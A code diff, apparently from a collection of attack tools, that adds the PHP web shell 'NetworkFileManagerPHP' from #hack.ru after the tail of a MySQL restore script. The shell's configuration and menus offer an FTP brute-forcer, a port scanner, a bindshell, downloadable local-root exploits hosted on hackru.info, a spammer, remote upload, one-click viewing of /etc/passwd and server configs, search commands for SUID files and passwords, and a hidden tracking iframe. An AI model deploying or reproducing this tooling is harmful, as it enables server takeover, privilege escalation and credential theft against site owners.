+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+        }
+
+        fclose($fp);
+       
+    }
+
+    function restore_error($query, $position) {
+        global $HTTP_GET_VARS;
+
+        $filename = $HTTP_GET_VARS['filename'];
+
+        $url = 'mysql_tool.php?act=do_restore&filename='.urlencode($filename).'&pos='.$position;
+
+        $mysql_error = mysql_error();
+
+        $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="600">
+        <tr>
+          <td align="center" class="title">Query Failed</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2">
+                    <div align="center">
+                        <strong>An error occurred due to an invalid query</strong>
+                        <br /><br />
+                        Query Executed: $query
+                        <br />
+                        MySQL Returned: $mysql_error
+                        <br /><br />
+                        <a href="$url">Continue restore process</a><br />
+                        <a href="{$url}&ignore_errors=1">Continue ignoring all further errors</a><br />
+                    </div>
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+    }
+    
+}
+
+
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/network.php.php.txt b/xakep-shells/PHP/network.php.php.txt
new file mode 100644
index 0000000..a0cf326
--- /dev/null
+++ b/xakep-shells/PHP/network.php.php.txt
@@ -0,0 +1,5603 @@
+<?
+
+if (ini_get('register_globals') != '1') {
+
+   if (!empty($HTTP_POST_VARS))
+
+    extract($HTTP_POST_VARS);
+
+
+
+  if (!empty($HTTP_GET_VARS))
+
+    extract($HTTP_GET_VARS);
+
+  if (!empty($HTTP_SERVER_VARS))
+
+    extract($HTTP_SERVER_VARS);
+
+}
+
+
+
+$use_md5=0; // Define use of MD5 crypt algoritm //
+
+$uname="1";
+
+$upass="1";
+
+
+
+
+
+
+if ($action != "download" && $action != "view" ):
+
+?>
+
+
+
+<?
+
+
+
+/* Define your email for file send function*/
+
+$demail ="effes2004@gmail.com";
+
+
+
+/* config here */
+
+$title="NetworkFileManagerPHP for channel #hack.ru";
+
+$ver="1.7.private ([final_english_release])";
+
+$sob="Belongs to <b><u>revers</u></b>";
+
+$id="1337";
+
+
+
+/* FTP-bruteforce */
+
+$filename="/etc/passwd";
+
+$ftp_server="localhost";
+
+/* port scanner */
+
+$min="1";
+
+$max="65535";
+
+
+
+/* Aliases */
+
+$aliases=array(
+
+/* find all SUID files */
+
+'find / -type f -perm -04000 -ls' => 'find all suid files'  ,
+
+/* find all SGID files */
+
+'find / -type f -perm -02000 -ls' => 'find all sgid files',
+
+/* find all config.inc.php files */
+
+'find / -type f -name config.inc.php' => 'find all config.inc.php files',
+
+/* find accesseable writeable directories and files*/
+
+'find / -perm -2 -ls' => 'find writeable directories and files',
+
+'ls -la' => 'Current directory listing with rights access',
+
+'find / -name *.php | xargs grep -li password' =>'searsh all file .php word password'
+
+
+
+);
+
+
+
+/* ports and services names */
+
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+
+$port[2] = "Management Utility";
+
+$port[3] = "Compression Process";
+
+$port[5] = "rje (Remote Job Entry)";
+
+$port[7] = "echo";
+
+$port[9] = "discard";
+
+$port[11] = "systat";
+
+$port[13] = "daytime";
+
+$port[15] = "netstat";
+
+$port[17] = "quote of the day";
+
+$port[18] = "send/rwp";
+
+$port[19] = "character generator";
+
+$port[20] = "ftp-data";
+
+$port[21] = "ftp";
+
+$port[22] = "ssh, pcAnywhere";
+
+$port[23] = "Telnet";
+
+$port[25] = "SMTP (Simple Mail Transfer)";
+
+$port[27] = "ETRN (NSW User System FE)";
+
+$port[29] = "MSG ICP";
+
+$port[31] = "MSG Authentication";
+
+$port[33] = "dsp (Display Support Protocol)";
+
+$port[37] = "time";
+
+$port[38] = "RAP (Route Access Protocol)";
+
+$port[39] = "rlp (Resource Location Protocol)";
+
+$port[41] = "Graphics";
+
+$port[42] = "nameserv, WINS";
+
+$port[43] = "whois, nickname";
+
+$port[44] = "MPM FLAGS Protocol";
+
+$port[45] = "Message Processing Module [recv]";
+
+$port[46] = "MPM [default send]";
+
+$port[47] = "NI FTP";
+
+$port[48] = "Digital Audit Daemon";
+
+$port[49] = "TACACS, Login Host Protocol";
+
+$port[50] = "RMCP, re-mail-ck";
+
+$port[53] = "DNS";
+
+$port[57] = "MTP (any private terminal access)";
+
+$port[59] = "NFILE";
+
+$port[60] = "Unassigned";
+
+$port[61] = "NI MAIL";
+
+$port[62] = "ACA Services";
+
+$port[63] = "whois++";
+
+$port[64] = "Communications Integrator (CI)";
+
+$port[65] = "TACACS-Database Service";
+
+$port[66] = "Oracle SQL*NET";
+
+$port[67] = "bootps (Bootstrap Protocol Server)";
+
+$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
+
+$port[69] = "Trivial File Transfer Protocol (tftp)";
+
+$port[70] = "Gopher";
+
+$port[71] = "Remote Job Service";
+
+$port[72] = "Remote Job Service";
+
+$port[73] = "Remote Job Service";
+
+$port[74] = "Remote Job Service";
+
+$port[75] = "any private dial out service";
+
+$port[76] = "Distributed External Object Store";
+
+$port[77] = "any private RJE service";
+
+$port[78] = "vettcp";
+
+$port[79] = "finger";
+
+$port[80] = "World Wide Web HTTP";
+
+$port[81] = "HOSTS2 Name Serve";
+
+$port[82] = "XFER Utility";
+
+$port[83] = "MIT ML Device";
+
+$port[84] = "Common Trace Facility";
+
+$port[85] = "MIT ML Device";
+
+$port[86] = "Micro Focus Cobol";
+
+$port[87] = "any private terminal link";
+
+$port[88] = "Kerberos, WWW";
+
+$port[89] = "SU/MIT Telnet Gateway";
+
+$port[90] = "DNSIX Securit Attribute Token Map";
+
+$port[91] = "MIT Dover Spooler";
+
+$port[92] = "Network Printing Protocol";
+
+$port[93] = "Device Control Protocol";
+
+$port[94] = "Tivoli Object Dispatcher";
+
+$port[95] = "supdup";
+
+$port[96] = "DIXIE";
+
+$port[98] = "linuxconf";
+
+$port[99] = "Metagram Relay";
+
+$port[100] = "[unauthorized use]";
+
+$port[101] = "HOSTNAME";
+
+$port[102] = "ISO, X.400, ITOT";
+
+$port[103] = "Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et";
+
+$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
+
+$port[105] = "CCSO name server protocol";
+
+$port[106] = "poppassd";
+
+$port[107] = "Remote Telnet Service";
+
+$port[108] = "SNA Gateway Access Server";
+
+$port[109] = "POP2";
+
+$port[110] = "POP3";
+
+$port[111] = "Sun RPC Portmapper";
+
+$port[112] = "McIDAS Data Transmission Protocol";
+
+$port[113] = "Authentication Service";
+
+$port[115] = "sftp (Simple File Transfer Protocol)";
+
+$port[116] = "ANSA REX Notify";
+
+$port[117] = "UUCP Path Service";
+
+$port[118] = "SQL Services";
+
+$port[119] = "NNTP";
+
+$port[120] = "CFDP";
+
+$port[123] = "NTP";
+
+$port[124] = "SecureID";
+
+$port[129] = "PWDGEN";
+
+$port[133] = "statsrv";
+
+$port[135] = "loc-srv/epmap";
+
+$port[137] = "netbios-ns";
+
+$port[138] = "netbios-dgm (UDP)";
+
+$port[139] = "NetBIOS";
+
+$port[143] = "IMAP";
+
+$port[144] = "NewS";
+
+$port[150] = "SQL-NET";
+
+$port[152] = "BFTP";
+
+$port[153] = "SGMP";
+
+$port[156] = "SQL Service";
+
+$port[161] = "SNMP";
+
+$port[175] = "vmnet";
+
+$port[177] = "XDMCP";
+
+$port[178] = "NextStep Window Server";
+
+$port[179] = "BGP";
+
+$port[180] = "SLmail admin";
+
+$port[199] = "smux";
+
+$port[210] = "Z39.50";
+
+$port[213] = "IPX";
+
+$port[218] = "MPP";
+
+$port[220] = "IMAP3";
+
+$port[256] = "RAP";
+
+$port[257] = "Secure Electronic Transaction";
+
+$port[258] = "Yak Winsock Personal Chat";
+
+$port[259] = "ESRO";
+
+$port[264] = "FW1_topo";
+
+$port[311] = "Apple WebAdmin";
+
+$port[350] = "MATIP type A";
+
+$port[351] = "MATIP type B";
+
+$port[363] = "RSVP tunnel";
+
+$port[366] = "ODMR (On-Demand Mail Relay)";
+
+$port[371] = "Clearcase";
+
+$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
+
+$port[389] = "LDAP";
+
+$port[407] = "Timbuktu";
+
+$port[427] = "Server Location";
+
+$port[434] = "Mobile IP";
+
+$port[443] = "ssl";
+
+$port[444] = "snpp, Simple Network Paging Protocol";
+
+$port[445] = "SMB";
+
+$port[458] = "QuickTime TV/Conferencing";
+
+$port[468] = "Photuris";
+
+$port[475] = "tcpnethaspsrv";
+
+$port[500] = "ISAKMP, pluto";
+
+$port[511] = "mynet-as";
+
+$port[512] = "biff, rexec";
+
+$port[513] = "who, rlogin";
+
+$port[514] = "syslog, rsh";
+
+$port[515] = "lp, lpr, line printer";
+
+$port[517] = "talk";
+
+$port[520] = "RIP (Routing Information Protocol)";
+
+$port[521] = "RIPng";
+
+$port[522] = "ULS";
+
+$port[531] = "IRC";
+
+$port[543] = "KLogin, AppleShare over IP";
+
+$port[545] = "QuickTime";
+
+$port[548] = "AFP";
+
+$port[554] = "Real Time Streaming Protocol";
+
+$port[555] = "phAse Zero";
+
+$port[563] = "NNTP over SSL";
+
+$port[575] = "VEMMI";
+
+$port[581] = "Bundle Discovery Protocol";
+
+$port[593] = "MS-RPC";
+
+$port[608] = "SIFT/UFT";
+
+$port[626] = "Apple ASIA";
+
+$port[631] = "IPP (Internet Printing Protocol)";
+
+$port[635] = "RLZ DBase";
+
+$port[636] = "sldap";
+
+$port[642] = "EMSD";
+
+$port[648] = "RRP (NSI Registry Registrar Protocol)";
+
+$port[655] = "tinc";
+
+$port[660] = "Apple MacOS Server Admin";
+
+$port[666] = "Doom";
+
+$port[674] = "ACAP";
+
+$port[687] = "AppleShare IP Registry";
+
+$port[700] = "buddyphone";
+
+$port[705] = "AgentX for SNMP";
+
+$port[901] = "swat, realsecure";
+
+$port[993] = "s-imap";
+
+$port[995] = "s-pop";
+
+$port[1024] = "Reserved";
+
+$port[1025] = "network blackjack";
+
+$port[1062] = "Veracity";
+
+$port[1080] = "SOCKS";
+
+$port[1085] = "WebObjects";
+
+$port[1227] = "DNS2Go";
+
+$port[1243] = "SubSeven";
+
+$port[1338] = "Millennium Worm";
+
+$port[1352] = "Lotus Notes";
+
+$port[1381] = "Apple Network License Manager";
+
+$port[1417] = "Timbuktu Service 1 Port";
+
+$port[1418] = "Timbuktu Service 2 Port";
+
+$port[1419] = "Timbuktu Service 3 Port";
+
+$port[1420] = "Timbuktu Service 4 Port";
+
+$port[1433] = "Microsoft SQL Server";
+
+$port[1434] = "Microsoft SQL Monitor";
+
+$port[1477] = "ms-sna-server";
+
+$port[1478] = "ms-sna-base";
+
+$port[1490] = "insitu-conf";
+
+$port[1494] = "Citrix ICA Protocol";
+
+$port[1498] = "Watcom-SQL";
+
+$port[1500] = "VLSI License Manager";
+
+$port[1503] = "T.120";
+
+$port[1521] = "Oracle SQL";
+
+$port[1522] = "Ricardo North America License Manager";
+
+$port[1524] = "ingres";
+
+$port[1525] = "prospero";
+
+$port[1526] = "prospero";
+
+$port[1527] = "tlisrv";
+
+$port[1529] = "oracle";
+
+$port[1547] = "laplink";
+
+$port[1604] = "Citrix ICA, MS Terminal Server";
+
+$port[1645] = "RADIUS Authentication";
+
+$port[1646] = "RADIUS Accounting";
+
+$port[1680] = "Carbon Copy";
+
+$port[1701] = "L2TP/LSF";
+
+$port[1717] = "Convoy";
+
+$port[1720] = "H.323/Q.931";
+
+$port[1723] = "PPTP control port";
+
+$port[1731] = "MSICCP";
+
+$port[1755] = "Windows Media .asf";
+
+$port[1758] = "TFTP multicast";
+
+$port[1761] = "cft-0";
+
+$port[1762] = "cft-1";
+
+$port[1763] = "cft-2";
+
+$port[1764] = "cft-3";
+
+$port[1765] = "cft-4";
+
+$port[1766] = "cft-5";
+
+$port[1767] = "cft-6";
+
+$port[1808] = "Oracle-VP2";
+
+$port[1812] = "RADIUS server";
+
+$port[1813] = "RADIUS accounting";
+
+$port[1818] = "ETFTP";
+
+$port[1973] = "DLSw DCAP/DRAP";
+
+$port[1985] = "HSRP";
+
+$port[1999] = "Cisco AUTH";
+
+$port[2001] = "glimpse";
+
+$port[2049] = "NFS";
+
+$port[2064] = "distributed.net";
+
+$port[2065] = "DLSw";
+
+$port[2066] = "DLSw";
+
+$port[2106] = "MZAP";
+
+$port[2140] = "DeepThroat";
+
+$port[2301] = "Compaq Insight Management Web Agents";
+
+$port[2327] = "Netscape Conference";
+
+$port[2336] = "Apple UG Control";
+
+$port[2427] = "MGCP gateway";
+
+$port[2504] = "WLBS";
+
+$port[2535] = "MADCAP";
+
+$port[2543] = "sip";
+
+$port[2592] = "netrek";
+
+$port[2727] = "MGCP call agent";
+
+$port[2628] = "DICT";
+
+$port[2998] = "ISS Real Secure Console Service Port";
+
+$port[3000] = "Firstclass";
+
+$port[3001] = "Redwood Broker";
+
+$port[3031] = "Apple AgentVU";
+
+$port[3128] = "squid";
+
+$port[3130] = "ICP";
+
+$port[3150] = "DeepThroat";
+
+$port[3264] = "ccmail";
+
+$port[3283] = "Apple NetAssitant";
+
+$port[3288] = "COPS";
+
+$port[3305] = "ODETTE";
+
+$port[3306] = "mySQL";
+
+$port[3389] = "RDP Protocol (Terminal Server)";
+
+$port[3521] = "netrek";
+
+$port[4000] = "icq, command-n-conquer and shell nfm";
+
+$port[4321] = "rwhois";
+
+$port[4333] = "mSQL";
+
+$port[4444] = "KRB524";
+
+$port[4827] = "HTCP";
+
+$port[5002] = "radio free ethernet";
+
+$port[5004] = "RTP";
+
+$port[5005] = "RTP";
+
+$port[5010] = "Yahoo! Messenger";
+
+$port[5050] = "multimedia conference control tool";
+
+$port[5060] = "SIP";
+
+$port[5150] = "Ascend Tunnel Management Protocol";
+
+$port[5190] = "AIM";
+
+$port[5500] = "securid";
+
+$port[5501] = "securidprop";
+
+$port[5423] = "Apple VirtualUser";
+
+$port[5555] = "Personal Agent";
+
+$port[5631] = "PCAnywhere data";
+
+$port[5632] = "PCAnywhere";
+
+$port[5678] = "Remote Replication Agent Connection";
+
+$port[5800] = "VNC";
+
+$port[5801] = "VNC";
+
+$port[5900] = "VNC";
+
+$port[5901] = "VNC";
+
+$port[6000] = "X Windows";
+
+$port[6112] = "BattleNet";
+
+$port[6502] = "Netscape Conference";
+
+$port[6667] = "IRC";
+
+$port[6670] = "VocalTec Internet Phone, DeepThroat";
+
+$port[6699] = "napster";
+
+$port[6776] = "Sub7";
+
+$port[6970] = "RTP";
+
+$port[7007] = "MSBD, Windows Media encoder";
+
+$port[7070] = "RealServer/QuickTime";
+
+$port[7777] = "cbt";
+
+$port[7778] = "Unreal";
+
+$port[7648] = "CU-SeeMe";
+
+$port[7649] = "CU-SeeMe";
+
+$port[8000] = "iRDMI/Shoutcast Server";
+
+$port[8010] = "WinGate 2.1";
+
+$port[8080] = "HTTP";
+
+$port[8181] = "HTTP";
+
+$port[8383] = "IMail WWW";
+
+$port[8875] = "napster";
+
+$port[8888] = "napster";
+
+$port[8889] = "Desktop Data TCP 1";
+
+$port[8890] = "Desktop Data TCP 2";
+
+$port[8891] = "Desktop Data TCP 3: NESS application";
+
+$port[8892] = "Desktop Data TCP 4: FARM product";
+
+$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
+
+$port[8894] = "Desktop Data TCP 6: COAL application";
+
+$port[9000] = "CSlistener";
+
+$port[10008] = "cheese worm";
+
+$port[11371] = "PGP 5 Keyserver";
+
+$port[13223] = "PowWow";
+
+$port[13224] = "PowWow";
+
+$port[14237] = "Palm";
+
+$port[14238] = "Palm";
+
+$port[18888] = "LiquidAudio";
+
+$port[21157] = "Activision";
+
+$port[22555] = "Vocaltec Web Conference";
+
+$port[23213] = "PowWow";
+
+$port[23214] = "PowWow";
+
+$port[23456] = "EvilFTP";
+
+$port[26000] = "Quake";
+
+$port[27001] = "QuakeWorld";
+
+$port[27010] = "Half-Life";
+
+$port[27015] = "Half-Life";
+
+$port[27960] = "QuakeIII";
+
+$port[30029] = "AOL Admin";
+
+$port[31337] = "Back Orifice";
+
+$port[32777] = "rpc.walld";
+
+$port[45000] = "Cisco NetRanger postofficed";
+
+$port[32773] = "rpc bserverd";
+
+$port[32776] = "rpc.spray";
+
+$port[32779] = "rpc.cmsd";
+
+$port[38036] = "timestep";
+
+$port[40193] = "Novell";
+
+$port[41524] = "arcserve discovery";
+
+
+
+/* finished config, here goes the design */
+
+$meta = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">";
+
+$style=<<<style
+
+<style>
+
+a.   {
+
+color: #ffffcc;
+
+text-decoration:none;
+
+font-family: Times New Roman;
+
+font-weight: bold;
+
+     }
+
+a.menu:hover   {
+
+color: #FF0000;
+
+font-family: Times New Roman;
+
+text-decoration: none
+
+font-weight: bold;
+
+          }
+
+a   {
+
+color: #000000;
+
+text-decoration:none;
+
+font-family: Tahoma;
+
+font-size: 11px;
+
+     }
+
+a:hover   {
+
+color: #184984;
+
+font-family: Tahoma;
+
+text-decoration: underline
+
+font-size: 11px;
+
+          }
+
+td.up{
+
+color: #996600;
+
+font-family: Verdana;
+
+font-weight: normal;
+
+font-size: 11px;
+
+}
+
+.pagetitle {
+
+font-family: Arial, Helvetica, sans-serif;
+
+color: #FFFFFF;
+
+text-decoration: none;
+
+font-size: 12px
+
+}
+
+.alert   {
+
+color: #FF0000;
+
+font-family: Tahoma;
+
+font-size: 11px;
+
+          }
+
+.button1 {
+
+font-size:11px;
+
+font-weight:bold;
+
+font-family:Verdana;
+
+background:#184984;
+
+border:1px solid #000000; cursor:hand; color:#ffffcc;
+
+}
+
+.inputbox {font-size:11px; font-family:Verdana, Arial, Helvetica, sans-serif; background:#EBEFF6; color:#213B72; border:1px solid #000000; font-weight:normal}
+
+.submit_button {  font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #FFFFFF; background-color: #999999;}
+
+.textbox { background: White; border: 1px #000000 solid; color: #000099; font-family: "Courier New", Courier, mono; font-size: 11px; scrollbar-face-color: #CCCCCC; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #FFFFFF; scrollbar-darkshadow-color: #FFFFFF; scrollbar-track-color: #FFFFFF; scrollbar-arrow-color: #000000 ; border-color: #000000 solid}
+
+b {  font-weight: bold}
+
+table {  font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #184984}
+
+</style>
+
+style;
+
+
+
+/* table styles */
+
+$style1=<<<table
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+table;
+
+$style2=<<<table_file
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+table_file;
+
+$style3=<<<table_dir
+
+STYLE="background:#28BECA" onmouseover="this.style.backgroundColor = '#FFFFCC'" onmouseout="this.style.backgroundColor = '#28BECA'"
+
+table_dir;
+
+$style4=<<<table_files
+
+STYLE="background:#DCDCB0" onmouseover="this.style.backgroundColor = '#28BECA'" onmouseout="this.style.backgroundColor = '#DCDCB0'"
+
+table_files;
+
+$style_button=<<<button
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+button;
+
+$style_open=<<<open
+
+STYLE="background:#006200" onmouseover="this.style.backgroundColor = '#006200'" onmouseout="this.style.backgroundColor = '#006200'"
+
+open;
+
+$style_close=<<<close
+
+STYLE="background:#FF0000" onmouseover="this.style.backgroundColor = '#FF0000'" onmouseout="this.style.backgroundColor = '#FF0000'"
+
+close;
+
+$ins=<<<ins
+
+<script>
+
+function ins(text){
+
+document.hackru.chars_de.value+=text;
+
+document.hackru.chars_de.focus();
+
+}
+
+</script>
+
+ins;
+
+
+
+/* send form */
+
+$form = "
+
+<br>     <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr>
+
+  <td align=center class=pagetitle colspan=2><b>Help for NetworkFileManagerPHP 1.7</b></font></b></td>
+
+  </tr>  <form method='POST' action='$PHP_SELF?action=feedback&status=ok'>
+
+     <tr>
+
+  <td colspan=2 align=center class=pagetitle><b>Feedback:</b></td>
+
+  </tr>
+
+    <tr>
+
+      <td width='250' class=pagetitle><b>Your name:</b></td>
+
+      <td width='250' class=pagetitle>
+
+        <input type='text' name='name' size='40' class='inputbox'></td>
+
+      </tr>
+
+    <tr>
+
+      <td width='250' class=pagetitle><b>Email:</b></td>
+
+      <td width='250'><input type='text' name='email' size='40' class='inputbox'></td>
+
+    </tr>
+
+
+
+  <tr>
+
+  <td colspan=2 align=center class=pagetitle><b>
+
+  Your questions and wishes:
+
+  </b></font></b></td>
+
+  </tr>
+
+  <tr>
+
+      <td width=500 colspan=2><textarea rows='4' name='pole' cols='84' class='inputbox' ></textarea></td></tr>
+
+  <tr>
+
+  <td align=right><input type='submit' value='GO' name='B1' class=button1 $style_button></td>
+
+      <td align=left><input type='reset' value='Clear' name='B2' class=button1 $style_button></td>
+
+      </tr>
+
+</form></table><br>
+
+";
+
+
+
+
+
+
+
+/* HTML Form */
+
+$HTML=<<<html
+
+<html>
+
+<head>
+
+<title>$title $ver</title>
+
+$meta
+
+$style
+
+$ins
+
+</head>
+
+
+
+<body bgcolor=#E0F7FF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center colspan=6 class=pagetitle><b>NetworkFileManagerPHP (© #hack.ru)</b> Version: <b>$ver</b> </td></tr>
+
+<tr><td align=center colspan=6 class=pagetitle>Script for l33t admin job</td></tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>Script help:</b></td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF'>.:Home</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href="http://hackru.info">.:#hack.ru</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href = '$PHP_SELF?action=feedback'>.:Feedback</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=help'>.:About</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=update'>.:Update</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+
+
+<tr>
+
+<td class=pagetitle align=center width='85%' ><b>Net tools:</b></td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=portscan'>.:Port scanner</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=ftp'>.:FTP bruteforce</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=tar'>.:Folder compression</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=sql'>.:Mysql Dump</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=bash'>.:bindshell (/bin/sh)</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%' ><b>Exploits access:</b></td>
+
+<td $style2 align=center width='15%' colspan=2><a class=menu href='$PHP_SELF?action=bash'>.:bindshell</a>&nbsp;&nbsp;</td>
+
+<td $style_open align=center width='15%' colspan=3><a  class=menu href='$PHP_SELF?action=exploits'>.:Exploits</a>&nbsp;&nbsp;</td>
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>l33t tools:</b></td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=crypte'>.:Crypter</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=decrypte'>.:Decrypter</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=brut_ftp'>.:Full access FTP</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=spam'>.:Spamer (!new!)</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=down'>.:Remote upload</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%' colspan=6>$sob&nbsp;&nbsp;ID:<u><b>$id</b></u></td>
+
+</tr>
+
+<tr>
+
+<td $style2 align=center width='15%' colspan=2><a class=menu href="$PHP_SELF?tm=/etc&fi=passwd&action=view">.:etc/passwd</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href = '$PHP_SELF?tm=/var/cpanel&fi=accounting.log&action=view'>.:cpanel log</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/usr/local/apache/conf&fi=httpd.conf&action=view'>.:httpd.conf[1]</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/etc/httpd&fi=httpd.conf&action=view'>.:httpd.conf[2]</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='http://goat.cx'>.:Bonus</td>
+
+
+
+</tr>
+
+<!-- add by revers -->
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>Traffic tools:</b></td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=gettraff'>.:Get the script</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<!-- end add by revers -->
+
+</table>
+
+html;
+
+$key="goatse";
+
+$string="<IFRAME src=http://hackru.info/adm/count_nfm.php width=1 height=1 frameBorder=0 width=0 height=0></iframe>";
+
+/* randomizing letters array for random filenames of compression folders */
+
+$CHARS = "abcdefghijklmnopqrstuvwxyz";
+
+for ($i=0; $i<6; $i++)  $pass .= $CHARS[rand(0,strlen($CHARS)-1)];
+
+
+
+/* set full path to host and dir where public exploits and soft are situated */
+
+$public_site = "http://hackru.info/adm/exploits/public_exploits/";
+
+/* $public_site = "http://localhost/adm/public_exploits/"; */
+
+/* Public exploits and soft */
+
+$public[1] = "s"; // bindshell
+
+$title_ex[1] = "
+
+&nbsp;&nbsp;bindtty.c - remote shell on 4000 port, with rights of current user (id of apache)<br>
+
+<dd><b>Run:</b> ./s<br>
+
+&nbsp;&nbsp;&nbsp;Connect tot host with your favorite telnet client. Best of them are <u><b>putty</b></u> and <u><b>SecureCRT</b></u>
+
+";
+
+$public[2] = "m"; // mremap
+
+$title_ex[2] = "
+
+&nbsp;&nbsp;MREMAP - allows to gain local root priveleges by exploiting the bug of memory .<br>
+
+<dd><b>Run:</b> ./m<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$public[3] = "p"; // ptrace
+
+$title_ex[3] = "
+
+&nbsp;&nbsp;PTRACE - good one, works like mremap, but for another bug<br>
+
+<dd><b>Run:</b> ./p<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$public[4] = "psyBNC2.3.2-4.tar.gz"; // psybnc
+
+$title_ex[4] = "
+
+&nbsp;&nbsp;psyBNC - Last release of favorite IRC bouncer<br>
+
+<dd><b>Decompression:</b> tar -zxf psyBNC2.3.2-4.tar.gz // will be folder <u>psybnc</u><br>
+
+<dd><b>Compilation, installing and running psybnc:</b> make // making psybnc // ./psybnc // You may edit psybnc.conf with NFM, Default listening port is 31337 - connect to it with your favotite IRC client and set a password<br>
+
+&nbsp;&nbsp;&nbsp;Allowed to run with uid of apache, but check out the firewall!
+
+";
+
+/* Private exploits */
+
+$private[1] = "brk"; // localroot root linux 2.4.*
+
+$title_exp[1] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - Exploit do_brk (code added) - gains local root priveleges if exploited succes<br>
+
+<dd><b>Run:</b> ./brk<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[2] = "dupescan"; // Glftpd DupeScan Local Exploit by RagnaroK
+
+$title_exp[2] = "
+
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon <br>
+
+<dd>There are 2 files: <b>dupescan</b> and <b>glftpd</b> To gain root uid, you need to write dupescan to <br>
+
+glftpd/bin/ with command <u>cp dupescan glftpd/bin/</u>, and after run <u>./glftpd</u>. Get the root!!!<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[3] = "glftpd";
+
+$title_exp[3] = "
+
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon <br>
+
+part 2<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[4] = "sortrace";
+
+$title_exp[4] = "
+
+&nbsp;&nbsp;Traceroute v1.4a5 exploit by sorbo - private local root exploit for traceroute up to 1.4.a5<br>
+
+<dd><b>Run:</b> ./sortrace<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[5] = "root";
+
+$title_exp[5] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - ptrace private_mod exploits, may gain local root privaleges<br>
+
+<dd><b>Run:</b> ./root<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[6] = "sxp";
+
+$title_exp[6] = "
+
